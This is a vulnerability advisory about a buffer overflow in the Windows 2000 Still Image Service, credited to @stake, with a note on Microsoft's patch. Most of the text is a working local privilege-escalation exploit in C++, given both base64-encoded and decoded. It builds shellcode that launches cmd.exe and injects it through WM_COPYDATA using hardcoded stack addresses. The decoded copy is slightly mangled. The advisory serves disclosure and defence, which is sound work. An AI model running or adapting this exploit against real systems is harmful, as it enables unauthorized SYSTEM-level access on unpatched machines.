Reported September 7, 2000 by @stake
- Microsoft Windows 2000
The Windows 2000 Still Image Service contains an unchecked buffer that could allow a user to gain elevated privileges on the system. According to Microsoft's bulletin, the Still Image Service is not installed by default, but is automatically installed when a user connects a still image device to the system. The service remains installed and continues to start each time the system is rebooted thereafter.
DEMONSTRATION
Proof-of-Concept Code provide by @stake:
--================
Content-Description: STISVC Proof Of Concept Code
Content-Disposition: attachment; filename="ownsti.cpp"
Content-Transfer-Encoding: BASE64
Content-Type: text/plain
I2luY2x1ZGU8d2luZG93cy5oPg0KDQojZGVmaW5lIEVYUFNJWkUgKDUyMCsxMDI0KQ0KLy8j
ZGVmaW5lIFNUQUNLVE9QICgweDAwNzBGRjU4KQkvLyBmb3IgU3RpU3ZjIHZlcnNpb24gNS4w
LjIxMzQuMSBpbiBXaW4ySw0KLy8jZGVmaW5lIEJVRkZFUkxPQyAoMHgwMDcwRkNCMCkNCiNk
ZWZpbmUgU1RBQ0tUT1AgKDB4MDA3MUZGNTgpCS8vIGZvciBTdGlTdmMgdmVyc2lvbiA1LjAu
MjEzNC4xIGluIFdpbjJLIFNQMQ0KI2RlZmluZSBCVUZGRVJMT0MgKDB4MDA3MUZDQjApDQoN
CmludCBXSU5BUEkgV2luTWFpbihISU5TVEFOQ0UgaEluc3QsIEhJTlNUQU5DRSBoUHJldiwg
TFBTVFIgbHBDbWRMaW5lLCBpbnQgblNob3cpDQp7DQoJY2hhciBmdW5reVtFWFBTSVpFXTsN
CgltZW1zZXQoZnVua3ksMHg5MCxFWFBTSVpFKTsNCglmdW5reVtFWFBTSVpFLTJdPShjaGFy
KTA7DQoJZnVua3lbRVhQU0laRS0xXT0oY2hhcikwOw0KDQoJLy8gV3JpdGUgY29kZQ0KDQoJ
SE1PRFVMRSBoS2VybmVsPUdldE1vZHVsZUhhbmRsZSgia2VybmVsMzIuZGxsIik7DQoNCi8v
CWZ1bmt5WzB4MF09KGNoYXIpMHhDQzsNCg0KCWZ1bmt5WzB4NF09KGNoYXIpMHg4MTsNCglm
dW5reVsweDVdPShjaGFyKTB4QzQ7DQoJZnVua3lbMHg2XT0oY2hhcikweDA0Ow0KCWZ1bmt5
WzB4N109KGNoYXIpMHhGQzsNCglmdW5reVsweDhdPShjaGFyKTB4RkY7DQoJZnVua3lbMHg5
XT0oY2hhcikweEZGOw0KDQoJZnVua3lbMHgxMF09KGNoYXIpMHhCODsNCgkqKERXT1JEICop
KCYoZnVua3lbMHgxMV0pKT1+KERXT1JEKUdldFByb2NBZGRyZXNzKGhLZXJuZWwsIldpbkV4
ZWMiKTsNCgkNCglmdW5reVsweDE1XT0oY2hhcikweEY3Ow0KIAlmdW5reVsweDE2XT0oY2hh
cikweEQwOw0KDQoJZnVua3lbMHgxN109KGNoYXIpMHg2QTsNCglmdW5reVsweDE4XT0oY2hh
cikweDAzOw0KCQ0KCWZ1bmt5WzB4MTldPShjaGFyKTB4QkI7DQoJKihEV09SRCAqKSgmKGZ1
bmt5WzB4MUFdKSk9fihEV09SRCkoQlVGRkVSTE9DKzB4MzApOw0KCQ0KCWZ1bmt5WzB4MUVd
PShjaGFyKTB4Rjc7DQoJZnVua3lbMHgxRl09KGNoYXIpMHhEMzsNCg0KCWZ1bmt5WzB4MjBd
PShjaGFyKTB4NTM7DQoNCglmdW5reVsweDIxXT0oY2hhcikweEZGOw0KCWZ1bmt5WzB4MjJd
PShjaGFyKTB4RDA7DQoJDQoJZnVua3lbMHgyM109KGNoYXIpMHhCODsNCgkqKERXT1JEICop
KCYoZnVua3lbMHgyNF0pKT1+KERXT1JEKUdldFByb2NBZGRyZXNzKGhLZXJuZWwsIkV4aXRQ
cm9jZXNzIik7DQoNCglmdW5reVsweDI4XT0oY2hhcikweEY3Ow0KCWZ1bmt5WzB4MjldPShj
aGFyKTB4RDA7DQoNCglmdW5reVsweDJBXT0oY2hhcikweEZGOw0KCWZ1bmt5WzB4MkJdPShj
aGFyKTB4RDA7DQoNCglmdW5reVsweDJDXT0oY2hhcikweENDOw0KCWZ1bmt5WzB4MkRdPShj
aGFyKTB4Q0M7DQoJZnVua3lbMHgyRV09KGNoYXIpMHhDQzsNCglmdW5reVsweDJGXT0oY2hh
cikweENDOw0KDQoJLy8gU2V0IHN0cmluZyB0byBleGVjdXRlDQoJbWVtY3B5KCYoZnVua3lb
MHgzMF0pLCJjbWQuZXhlICIsOCk7DQogDQoJLy8gU2V0IHJldHVybiBhZGRyDQoJKihEV09S
RCAqKSgmKGZ1bmt5WzB4MjA4XSkpPUJVRkZFUkxPQzsNCg0KCS8vIEdldCBOZXREREUgV2lu
ZG93DQoJSFdORCBod25kPUZpbmRXaW5kb3coIlNUSUV4ZV9XaW5kb3dfQ2xhc3MiLCJTVEkg
TW9uaXRvciIpOw0KDQoJLy8gQ29weSBleHBsb2l0IGNvZGUNCglDT1BZREFUQVNUUlVDVCBj
ZHM7DQoJY2RzLmNiRGF0YT1zaXplb2YoZnVua3kpOw0KCWNkcy5kd0RhdGE9MDsNCgljZHMu
bHBEYXRhPShQVk9JRClmdW5reTsNCg0KCVNlbmRNZXNzYWdlKGh3bmQsV01fQ09QWURBVEEs
KFdQQVJBTSlod25kLChMUEFSQU0pJmNkcyk7DQoNCglQb3N0TWVzc2FnZShod25kLDB4NENE
LDAsKExQQVJBTSkoU1RBQ0tUT1AtRVhQU0laRSkpOw0KDQoJcmV0dXJuIDA7DQp9.
--================--
Decoding the above base64-encoded file reveals the following source code:
define STACKTOP
(0x0070FF58) // for StiSvc version 5.0.2134.1 in Win2K
//#define BUFFERLOC (0x0070FCB0)
#define STACKTOP (0x0071FF58) // for StiSvc version 5.0.2134.1 in Win2K
SP1
#define BUFFERLOC (0x0071FCB0)
int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmdLine, int nShow)
\{
char funky\[EXPSIZE\];
memset(funky,0x90,EXPSIZE);
funky\[EXPSIZE-2\]=(char)0;
funky\[EXPSIZE-1\]=(char)0;
// Write code
HMODULE hKernel=GetModuleHandle("kernel32.dll");
// funky\[0x0\]=(char)0xCC;
funky\[0x4\]=(char)0x81;
funky\[0x5\]=(char)0xC4;
funky\[0x6\]=(char)0x04;
funky\[0x7\]=(char)0xFC;
funky\[0x8\]=(char)0xFF;
funky\[0x9\]=(char)0xFF;
funky\[0x10\]=(char)0xB8;
*(DWORD
*)(&(funky\[0x11\]))=~(DWORD)GetProcAddress(hKernel,"WinExec");
funky\[0x15\]=(char)0xF7;
funky\[0x16\]=(char)0xD0;
funky\[0x17\]=(char)0x6A;
funky\[0x18\]=(char)0x03;
funky\[0x19\]=(char)0xBB;
*(DWORD *)(&(funky\[0x1A\]))=~(DWORD)(BUFFERLOC+0x30);
funky\[0x1E\]=(char)0xF7;
funky\[0x1F\]=(char)0xD3;
funky\[0x20\]=(char)0x53;
funky\[0x21\]=(char)0xFF;
funky\[0x22\]=(char)0xD0;
funky\[0x23\]=(char)0xB8;
*(DWORD
*)(&(funky\[0x24\]))=~(DWORD)GetProcAddress(hKernel,"ExitProcess");
funky\[0x28\]=(char)0xF7;
funky\[0x29\]=(char)0xD0;
funky\[0x2A\]=(char)0xFF;
funky\[0x2B\]=(char)0xD0;
funky\[0x2C\]=(char)0xCC;
funky\[0x2D\]=(char)0xCC;
funky\[0x2E\]=(char)0xCC;
funky\[0x2F\]=(char)0xCC;
// Set string to execute
memcpy(&(funky\[0x30\]),"cmd.exe ",8);
// Set return addr
*(DWORD *)(&(funky\[0x208\]))=BUFFERLOC;
// Get NetDDE Window
HWND hwnd=FindWindow("STIExe_Window_Class","STI
Monitor");
// Copy exploit code
COPYDATASTRUCT cds;
cds.cbData=sizeof(funky);
cds.dwData=0;
cds.lpData=(PVOID)funky;
SendMessage(hwnd,WM_COPYDATA,(WPARAM)hwnd,(LPARAM)&cds);
PostMessage(hwnd,0x4CD,0,(LPARAM)(STACKTOP-EXPSIZE));
return 0;
\}
VENDOR RESPONSE
Microsoft is aware of this problem and has issued FAQ #FQ00-065, Support Online article Q272736, and a patch to correct this matter.
CREDIT
Discovered by @stake
